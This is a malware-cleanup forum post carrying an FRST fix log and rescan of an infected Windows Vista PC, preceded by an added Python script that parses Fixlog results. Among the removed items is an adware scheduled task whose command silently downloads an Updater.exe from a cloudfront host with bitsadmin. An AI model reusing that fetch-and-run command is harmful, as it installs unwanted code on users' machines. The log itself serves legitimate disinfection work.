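One way to read the Fixlog.txt that the fix in Step 1 produces, as an added example that is not part of the original posts and is not FRST's own code: the Python below groups each result line by outcome and lists moved paths that a follow-up scan still mentions. The sample logs are constructed, and the function names and outcome categories are this example's assumptions.

```python
import re
from collections import Counter

# Constructed Fixlog.txt excerpt (made-up names) in the FRST Fixlog layout.
SAMPLE_FIXLOG = r"""Content of fixlist:
*****************
HKLM\...\Run: [ExampleAdware] => C:\Program Files\ExampleAdware\ex.exe [100 2015-01-01] ()
C:\Program Files\ExampleAdware
EmptyTemp:
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ExampleAdware => value deleted successfully.
C:\Program Files\ExampleAdware => Moved successfully.
exdrv => Service deleted successfully.
"C:\Windows\System32\drivers\exdrv.sys" => File/Directory not found.
HKCR\CLSID\{00000000-0000-0000-0000-000000000001} => Key not found. 
C:\Users\Example\AppData\Local\exdata => Moved successfully.
C:\ProgramData\exlocked.dll => outcome wording invented for this sample
EmptyTemp: => Removed 12.3 MB temporary data.

The system needed a reboot. 

==== End of Fixlog 12:00:00 ====
"""

# Constructed excerpt of the follow-up FRST.txt scan requested after the fix.
SAMPLE_RESCAN = r"""HKLM\...\Run: [ExTray] => C:\Program Files\Example\tray.exe [100 2015-01-01] (Example Ltd.)
2015-01-02 10:00 - 2015-01-02 10:00 - 00000000 ____D () C:\Users\Example\AppData\Local\exdata
"""

# Outcome wordings seen in Fixlog result lines, checked in this order.
OUTCOMES = [
    ("not_found", re.compile(r"not found", re.I)),
    ("moved", re.compile(r"moved successfully", re.I)),
    ("deleted", re.compile(r"deleted successfully", re.I)),
    ("cleaned", re.compile(r"^removed\b", re.I)),
]
PATH_RX = re.compile(r"^[A-Za-z]:\\")


def classify(outcome):
    """Map the text after '=>' to a category; unknown wording becomes 'other'."""
    for name, rx in OUTCOMES:
        if rx.search(outcome):
            return name
    return "other"


def parse_fixlog(text):
    """Return [(target, outcome_text, category)] for every result line."""
    # The fixlist is echoed between two rows of asterisks and also contains
    # ' => ', so only the part after the second row is treated as results.
    parts = re.split(r"^\*{5,}[ \t]*$", text, flags=re.M)
    body = parts[-1] if len(parts) >= 3 else text
    results = []
    for line in body.splitlines():
        target, sep, outcome = line.strip().rpartition(" => ")
        if not sep:
            continue  # blank lines, status lines, footer
        outcome = outcome.strip()
        results.append((target.strip().strip('"'), outcome, classify(outcome)))
    return results


def summarize(text):
    """Counts per category plus the entries a reviewer should look at."""
    results = parse_fixlog(text)
    return {
        "counts": Counter(cat for _, _, cat in results),
        "not_found": [t for t, _, cat in results if cat == "not_found"],
        "needs_review": [(t, o) for t, o, cat in results if cat == "other"],
        "reboot": "The system needed a reboot" in text,
    }


def residual_paths(fixlog_text, rescan_text):
    """Moved file-system paths that the later scan still lists.

    This is a case-insensitive substring match, so a hit is a prompt to
    inspect that scan entry, not proof that the move failed.
    """
    haystack = rescan_text.lower()
    return [
        target
        for target, _, cat in parse_fixlog(fixlog_text)
        if cat == "moved" and PATH_RX.match(target) and target.lower() in haystack
    ]


if __name__ == "__main__":
    report = summarize(SAMPLE_FIXLOG)
    print(dict(report["counts"]))
    print("not found:", report["not_found"])
    print("needs review:", report["needs_review"])
    print("still listed:", residual_paths(SAMPLE_FIXLOG, SAMPLE_RESCAN))
```
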
 

#5 SereneSnake

  • Topic Starter


Posted 14 April 2015 - 11:53 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 14-04-2015
Ran by Angel at 2015-04-14 23:38:34 Run:1
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
C:\Program Files\Smgy0ntk1mjjizdb
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys 
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File 
Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File 
Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe 
Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File 
Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File 
Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File 
Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File 
Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File 
Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File 
Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File 
Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe 
Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe 
EmptyTemp:
*****************
 
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\NPSStartup => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\mgy0ntk1mjjizdb => value deleted successfully.
C:\Program Files\Smgy0ntk1mjjizdb => Moved successfully.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => Key deleted successfully.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD79A59-37B1-459B-9097-09F9FAB8A523}" => Key deleted successfully.
HKCR\CLSID\{1FD79A59-37B1-459B-9097-09F9FAB8A523} => Key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => Key deleted successfully.
HKCR\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => Key not found. 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value deleted successfully.
HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => Key not found. 
mgi0nzk4mjziyjb => Service deleted successfully.
"C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys" => File/Directory not found.
C:\Users\Angel\AppData\Local\Setup642505 => Moved successfully.
C:\Users\Angel\AppData\Local\mota => Moved successfully.
C:\Program Files\Smgy0ntk1mjjizdb(232) => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{04D7FA9D-8045-4496-A910-855A2B4FDD46}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04D7FA9D-8045-4496-A910-855A2B4FDD46}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASP" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0C0ACF2A-85AA-457B-B56B-C0FF5A803C48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C0ACF2A-85AA-457B-B56B-C0FF5A803C48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1756FC84-4B84-4489-A32A-89CF57DE0260}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1756FC84-4B84-4489-A32A-89CF57DE0260}" => Key deleted successfully.
C:\Windows\System32\Tasks\amiupdaterExd => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\amiupdaterExd" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1E227E50-07C4-4479-ADCD-AF829E565408}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E227E50-07C4-4479-ADCD-AF829E565408}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4E8CAF01-3DAC-4A8B-B283-511599629E2C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E8CAF01-3DAC-4A8B-B283-511599629E2C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Idle~_~Crawler Runner" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7A14E8EA-A987-4687-AA80-8CC58A9C4624}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A14E8EA-A987-4687-AA80-8CC58A9C4624}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RocketTab" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2A83717-5995-48CA-85DE-4FC74F3D8ED1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2A83717-5995-48CA-85DE-4FC74F3D8ED1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AmiUpdXp" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B0A2C3D0-4B3B-4591-B037-13F9DF6031F0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0A2C3D0-4B3B-4591-B037-13F9DF6031F0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RocketTab Update Task" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BCE0938D-23E3-4454-B630-F48F50BACE78}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BCE0938D-23E3-4454-B630-F48F50BACE78}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PennyBee" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Groovorio Updater" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDCCD7C6-13F9-4525-9576-9B26112FB9EA}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDCCD7C6-13F9-4525-9576-9B26112FB9EA}" => Key deleted successfully.
C:\Windows\System32\Tasks\amiupdaterExi => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\amiupdaterExi" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E41555CC-B83C-4225-A5A1-3DA9A104ABC7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E41555CC-B83C-4225-A5A1-3DA9A104ABC7}" => Key deleted successfully.
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Maintenance\Idle~_~Crawler Update" => Key deleted successfully.
EmptyTemp: => Removed 533.7 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog 23:43:15 ====
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 14-04-2015
Ran by Angel (administrator) on ANGEL-PC on 14-04-2015 23:46:39
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
